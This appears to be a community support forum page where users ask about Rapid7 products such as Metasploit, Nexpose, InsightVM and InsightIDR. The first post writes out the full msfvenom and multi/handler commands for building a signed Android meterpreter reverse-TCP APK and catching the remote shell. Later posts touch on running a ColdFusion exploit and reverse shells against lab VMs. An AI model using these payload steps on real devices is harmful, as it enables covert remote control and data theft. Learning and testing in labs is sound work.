First of all, I'm a beginner in metasploit. Sorry if anyone asked this question before. My problem is, that when I create an android meterpreter reverse__tcp payload, start the listener, install andd run the app on an android device, the session "freezes" and the meterpreter session is not showing up. It's not quitting and showing the exploit(multi/handler). It just drops an empty line. On windows it's working perfectly. I read that is the session is in the background, but none of the commands "sessions -l" or "sessions -i <id>" are working. My commands: APK: * msfvenom -p android/meterpreter/reverse_tcp LHOST=MY_IP LPORT=1234 R > /location/path * then I sign it with jarsigner Listener: * msfconsole * use exploit/multi/handler * set LHOST MY__IP * set LPORT 1234 * set payload android/meterpreter/reverse__tcp * exploit When I open the app on the device, metasploit says: Started reverse TCP handler on 192.168.100.100:1234 ** Sending stage (72445 bytes) to 192.168.100.101 ** Meterpreter session 4 opened (192.168.100.100:1234 -> 192.168.100.101:46925) at 2019-08-18 16:01:43 -0500
Posted by Bence Varga about a month ago
I recently created a list of Sites through the API and am now attempting to attach scheduled scans to the sites. I have worked through the API documentation and built out the request, however the last remaining issue had a response of "null" with no indication of what the issue is. { "assets": { "excludedAssetGroups": { "assetGroupIDs": [ ], "links": [ { "href": "", "rel": "" } ] }, "excludedTargets": { "addresses": [ "" ], "links": [ { "href": "", "rel": "" } ] }, "includedAssetGroups": { "assetGroupIDs": [ ], "links": [ { "href": "", "rel": "" } ] }, "includedTargets": { "addresses": [ "10.1.105.0/24" ], "links": [ { "href": "", "rel": "" } ] } }, "duration": "P0DT1H0M", "enabled": true, "id": 1, "links": [ { "href": "", "rel": "" } ], "onScanRepeat": "resume-scan", "repeat": { "every": "week", "interval": 1, "lastDayOfMonth": false }, "scanEngineId": "6", "scanName": "Discovery", "scanTemplateId": "discovery", "start": "2019-09-21T07:25:00Z" } Response: { "status": 400, "links": [ { "href": "https://<redacted>/api/3/sites/95/scan_schedules", "rel": "self" } ] }
Posted by Nate French about a month ago
Good Day I would like to ask about providing first line support to a customer and what are your duties as a new distributor. Is there a difference if the customer buys only 1 licence or they buy 5000 licences and they ask that you also include first line support to their bill for the duration of their licence, do you bill them every time when they contact you depending on their queries or its a once off bill included with the licence? If someone can explain it in detail or provide a link for me to read up on it I would appreciate it a lot. I am not sure if my question is clear as I am new Rapid7 and would like to ask a few questions. Thank you for your time in reading this Regards Annah
Posted by Mbokeleng Annah Ratshitsane about a month ago
During a vulnerability assessment, i noticed some problem in the scanning results. If my assets has two IP with the same FQDN resolution, Nexpose groups the results of both of them in only one IP mixing the results of both. Step to reproduce the bug: #Assets: IP1: 192.168.1.22 --> FQDN: test.example.com --> OS: Windows IP2: 192.168.1.33 --> FQDN: test.example.com --> OS: Linux # Results (displayed only IP1): + OS detected: Windows and Linux + Vulnerability: both of the IP1 and of the IP2 Is there a solution?
Posted by Gino Lava about a month ago
Is there a way to 'disable' a benchmark? I have several benchmarks that are 'enabled' and being evaluated against that are not relevant. I can't seem to find a way to 'disable' them. This is in InsightVM and I am a Global Administrator. Thanks!
Posted by Doug Dergan about a month ago
In Leql (InsightOps/LogEntries), how do I filter on a calculated result that follows a groupby... so something like where(x) groupby(id) calculate(count) *HAVING(count>1)* The "HAVING(count>1)" is what I need to do. Thanks.
Posted by Joshua Smith about a month ago
I have an SQL query that validates however it fails when I try to run it. Below is the query. WITH tag_id AS ( SELECT tag_id AS Owners FROM fact_tag JOIN dim_tag USING (tag_id) ) SELECT DISTINCT da.ip_address, da.host_name, dv.title AS vulnerability, proofAsText(dv.description) AS vulnerability_description,summary, url, dv.severity, round(dv.riskscore::numeric, 0) AS risk, round(dv.cvss_score::numeric, 2) AS cvss_score FROM fact_asset_vulnerability_instance favi JOIN dim_asset da USING (asset_id) JOIN dim_vulnerability dv USING (vulnerability_id) JOIN dim_site_asset dsa USING (asset_id) JOIN dim_site ds USING (site_id) JOIN dim_vulnerability_solution dp USING (vulnerability_id) JOIN dim_solution dsvc USING (solution_id) ORDER BY cvss_score desc #insightvm
Posted by Tom about a month ago
Hi, Nexpose is showing "python2.7-minimal 2.7.15-4ubuntu4~18.04" as High/Severe vulnerable. But as per Ubuntu advisiories https://usn.ubuntu.com/3817-1/. "python2.7-minimal 2.7.15-4ubuntu4~18.04" This is only the latese update in 2.7.15 minimal version. Is this a false-positive? prompt response will be highly appreciable. regards, Rahul
Posted by Rahul Raj about a month ago
Hi, I have Metasploit Pro and Insight VM trials (Windows 10.) I'm getting started with Metasploitable 2 (VMware.) I found the Applicable Module "Adobe ColdFusion 9 Administrative Login Bypass". I'm trying exploit/multi/http/coldfusion_rds. After setting the options and increasing HTTPDELAY, I run the exploit. I get the error: "Exploit aborted due to failure: unknown: 98.192.xxx.xxx:80 - RDS component was unreachable". This is probably an easy question but how do I fix this so I can try my exploit? I'm using the Metasploit Pro Console on Windows 10. Please reply. Thanks!
Posted by Mike Held about a month ago
We have installed InsightIDR a week ago, and we have configured 2 SQL database servers as Event Sources. These worked for only a few hours yesterday. From noon onwards, Unknown error: com.rapid7.net.wmi.exception.WMIException error is showing. Can you please help? #insightidr
Posted by David Spiteri about a month ago
So, we have deployed agents to all of our datacenter servers. Some of them show up in the console checking in, but there is about 300+ that don't show up. When we go to the online cloud for insight is shows all of them checking in but only some make it on prem. Any suggestions?
Posted by Chris H. about a month ago
Hi, We are in the process of evaluation phase of Nexpose on-premise vulnerability management solution. We have installed the Nexpose trial version and run a scan where internet access is mandatory for successful scan otherwise the scan is not successful. Is it possible to download and install vulnerability database locally and run a successful scan via trial version without providing internet access on this particular machine? please guide.
Posted by Nawazish about a month ago
Ladies and gents.. I am tryin to make reverse_tcp payload from another vm machine (Parrot) to another ubuntu (basic_pentesting 1) from https://www.vulnhub.com/entry/basic-pentesting-1,216/ . I tried everything , diffrent vm ,scenarios ,diffrent networks settings , platforms ,killing process , changeing ports and i cant get around this step. https://postimg.cc/R6yVGmG3 Any advise? thanks in advance best regards
Posted by nitro about a month ago
I want to track our windows 7 removal. Can someone please walk me through the filters i will need to get this set up in Goals and SLAs? The issue I am experiencing is Windows 7 is not an obsolete OS yet, so I don't know how to properly monitor and track our progress.
Posted by MARC HIEMER about a month ago
In my InsightIDR portal, I enter the username in the search bar at the top, find the name in the dropdown provided and click, and nothing.. I can't get to User Details at all. One other dept member said he experienced this as well. Using both Chrome and Firefox. Nothing listed in the forums. Anyone have problems searching for users in InsightIDR?
Posted by Kevin Lanning about a month ago